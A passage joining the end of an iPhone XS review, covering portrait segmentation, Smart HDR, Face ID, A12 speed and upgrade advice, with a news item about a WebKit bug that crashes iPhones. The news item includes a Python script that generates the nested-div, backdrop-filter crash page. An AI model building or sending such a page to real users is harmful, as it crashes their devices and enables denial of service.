Developers do have access to one new feature though, the segmentation mask. This is a more precise mask that aids in edge detailing, improving hair and fine line detail around the edges of a portrait subject. In my testing it has led to better handling of these transition areas and less clumsiness. It’s still not perfect, but it’s better. And third-party apps like Halide are already utilizing it. Halide’s co-creator, Ben Sandofsky, says they’re already seeing improvements in Halide with the segmentation map.
“Segmentation is the ability to classify sets of pixels into different categories,” says Sandofsky. “This is different than a “Hot dog, not a hot dog” problem, which just tells you whether a hot dog exists anywhere in the image. With segmentation, the goal is drawing an outline over just the hot dog. It’s an important topic with self driving cars, because it isn’t enough to tell you there’s a person somewhere in the image. It needs to know that person is directly in front of you. On devices that support it, we use PEM as the authority for what should stay in focus. We still use the classic method on old devices (anything earlier than iPhone 8), but the quality difference is huge.”
The above is an example shot in Halide that shows the image, the depth map and the segmentation map.
My testing of portrait mode on the iPhone XS says that it is massively improved, but that there are still some very evident quirks that will lead to weirdness in some shots like wrong things made blurry and halos of light appearing around subjects. It’s also not quite aggressive enough on foreground objects — those should blur too but only sometimes do. But the quirks are overshadowed by the super cool addition of the adjustable background blur. If conditions are right it blows you away. But every once in a while you still get this sense like the Neural Engine just threw up its hands and shrugged.
Live preview of the depth control in the camera view is not in iOS 12 at the launch of the iPhone XS, but it will be coming in a future version of iOS 12 this fall.
I also shoot a huge amount of photos with the telephoto lens. It’s closer to what you’d consider to be a standard lens on a camera. The normal lens is really wide, and once you acclimate to the telephoto you’re left wondering why you have a bunch of pictures of people in the middle of a ton of foreground and sky. If you haven’t already, I’d say try defaulting to 2x for a couple of weeks and see how you like your photos. For those tight conditions or really broad landscapes you can always drop it back to the wide. Because of this, any iPhone that doesn’t have a telephoto is basically a non-starter for me, which I believe is going to be one of the limiters on people moving from the iPhone X to the iPhone XR. And I believe even iPhone 8 Plus users who rely on the telephoto will miss it if they don’t go to the XS.
But, man, Smart HDR is where it’s at
I’m going to say something now that is surely going to cause some Apple followers to snort, but it’s true. Here it is:
For a company as prone to hyperbole and Maximum Force Enthusiasm about its products, I think Apple has dramatically undersold how much photos have improved from the iPhone X to the iPhone XS. It’s extreme, and it has to do with a technique Apple calls Smart HDR.
Smart HDR on the iPhone XS encompasses a bundle of techniques and technologies, including highlight recovery, rapid-firing the sensor, an OLED screen with much-improved dynamic range and the Neural Engine/image signal processor combo. The camera is now running faster sensors and offloading some of the work to the processor, which enables it to fire off nearly two images for every one it used to, making sure that motion does not create ghosting in HDR images. It picks the sharpest image, merges the other frames into it in a smarter way and applies tone mapping that produces more even exposure and color in the roughest of lighting conditions.
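The general multi-frame idea — score the frames for sharpness, use the sharpest as the reference, and blend the rest into it — can be sketched on toy one-dimensional "frames". This is an illustration of the technique in the abstract, not Apple’s actual pipeline, and the sharpness metric here is deliberately crude.

```python
# Toy sketch of multi-frame merging: pick the sharpest frame as the
# reference, then average the others into it with a low blend weight.
# Not Apple's pipeline -- just the general shape of the technique.
def sharpness(frame):
    """Crude sharpness score: sum of absolute neighbor differences."""
    return sum(abs(a - b) for a, b in zip(frame, frame[1:]))

def merge_frames(frames, blend=0.25):
    ref = max(frames, key=sharpness)  # sharpest frame wins
    others = [f for f in frames if f is not ref]
    merged = []
    for i, base in enumerate(ref):
        mean_other = sum(f[i] for f in others) / len(others)
        merged.append((1 - blend) * base + blend * mean_other)
    return merged

frames = [
    [0, 100, 0, 100],  # sharp frame (big neighbor differences)
    [40, 60, 40, 60],  # softer exposure
    [50, 50, 50, 50],  # flat frame
]
print(merge_frames(frames))
```

The reference frame dominates, so motion between frames contributes only softly to the result — which is the intuition behind avoiding ghosting.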
Nearly every image you shoot on an iPhone XS or iPhone XS Max will have HDR applied to it. It does it so much that Apple has stopped labeling most images with HDR at all. There’s still a toggle to turn Smart HDR off if you wish, but by default it will trigger any time it feels it’s needed.
And that includes more types of shots that could not benefit from HDR before: panoramic shots, for instance, as well as burst shots, low-light photos and every frame of Live Photos.
The results for me have been massively improved quick snaps with no thought given to exposure or adjustments due to poor lighting. Your camera roll as a whole will just suddenly start looking like you’re a better picture taker, with no intervention from you. All of this is capped off by the fact that the OLED screens in the iPhone XS and XS Max have a significantly improved ability to display a range of color and brightness. So images will just plain look better on the wider gamut screen, which can display more of the P3 color space.
As far as Face ID goes, there has been no perceivable difference for me in speed or the number of successful recognitions, but my facial model has been training on my iPhone X for a year. It’s starting fresh on the iPhone XS. And I’ve always been lucky that Face ID has just worked for me most of the time. The gist of the improvements here is jumps in acquisition time and in confirming the map against the pattern match. There are also supposed to be improvements in off-angle recognition of your face, say when lying down or when your phone is flat on a desk. I tried a lot of different positions here and could never really definitively say that the iPhone XS was better in this regard, though as I said above, it very likely takes training time to get it near the confidence levels that my iPhone X has stored away.
In terms of CPU performance the world’s first at-scale 7nm architecture has paid dividends. You can see from the iPhone XS benchmarks that it compares favorably to fast laptops and easily exceeds iPhone X performance.
The Neural Engine and the improved A12 chip mean better frame rates in intense games and AR, faster image searches and some small improvement in app launches. One easy way to demonstrate this is the video from the iScape app, captured on an iPhone X and an iPhone XS. You can see how jerky and FPS-challenged the iPhone X is in a similar AR scenario. There is so much more headroom for AR experiences that I know developers are going to be salivating over what they can do here.
The stereo sound is impressive: surprisingly decent separation for a phone, and definitely louder. The tradeoff is that you get asymmetrical speaker grilles, so if that kind of thing annoys you, well, you’re welcome.
Every other year for the iPhone I see and hear the same things — that the middle years are unimpressive and not worthy of upgrading. And I get it, money matters, phones are our primary computer and we want the best bang for our buck. This year, as I mentioned at the outset, the iPhone X has created its own little pocket of uncertainty by still feeling a bit ahead of its time.
I don’t kid myself into thinking that we’re going to have an honest discussion about whether you want to upgrade from the iPhone X to iPhone XS or not. You’re either going to do it because you want to or you’re not going to do it because you don’t feel it’s a big enough improvement.
And I think Apple is completely fine with that because iPhone XS really isn’t targeted at iPhone X users at all, it’s targeted at the millions of people who are not on a gesture-first device that has Face ID. I’ve never been one to recommend someone upgrade every year anyway. Every two years is more than fine for most folks — unless you want the best camera, then do it.
And, given Apple’s fairly bold talk about making sure that iPhones last as long as they can, I think it is well into the era where it is planning on having a massive installed user base that rents iPhones from it on a monthly, yearly or biennial basis. And it doesn’t care whether those phones are on their first, second or third owner, because that user base will need for-pay services that Apple can provide. It seems to be moving in that direction already, with phones as old as the five-year-old iPhone 5s still getting iOS updates.
With the iPhone XS, we might just be seeing the true beginning of the iPhone-as-a-service era.
A security researcher has found a new way to crash and restart any iPhone — with just a few lines of code.
Sabri Haddouche tweeted a proof-of-concept webpage with just 15 lines of code which, if visited, will crash and restart an iPhone or iPad. Those on macOS may also see Safari freeze when opening the link.
The code exploits a weakness in iOS’ web rendering engine WebKit, which Apple mandates all apps and browsers use, Haddouche told TechCrunch. He explained that by nesting a ton of elements — such as <div> tags — inside a backdrop-filter property in CSS, you can use up all of the device’s resources and cause a kernel panic, which shuts down and restarts the operating system to prevent damage.
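Based on that description — many nested elements inside a CSS backdrop-filter — a page with the same shape can be generated like this. To be clear, this is a reconstruction of the structure described, not Haddouche’s actual 15-line proof of concept, and the blur value is an arbitrary placeholder; don’t load the output on a device you care about.

```python
# Generate an HTML page shaped like the described attack: a deep pile
# of nested <div>s styled with a CSS backdrop-filter. Reconstructed
# from the article's description, not the original proof of concept.
def make_poc(depth=3500):
    style = "<style>div { backdrop-filter: blur(2px); }</style>"
    body = "<div>" * depth + "x" + "</div>" * depth
    return f"<html><head>{style}</head><body>{body}</body></html>"

page = make_poc(depth=5)       # tiny depth just to inspect the shape
print(page.count("<div>"))     # 5
```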
“Anything that renders HTML on iOS is affected,” he said. That means the crash can be triggered by a link someone sends you on Facebook or Twitter, by any webpage you visit that includes the code, or by an email, he warned.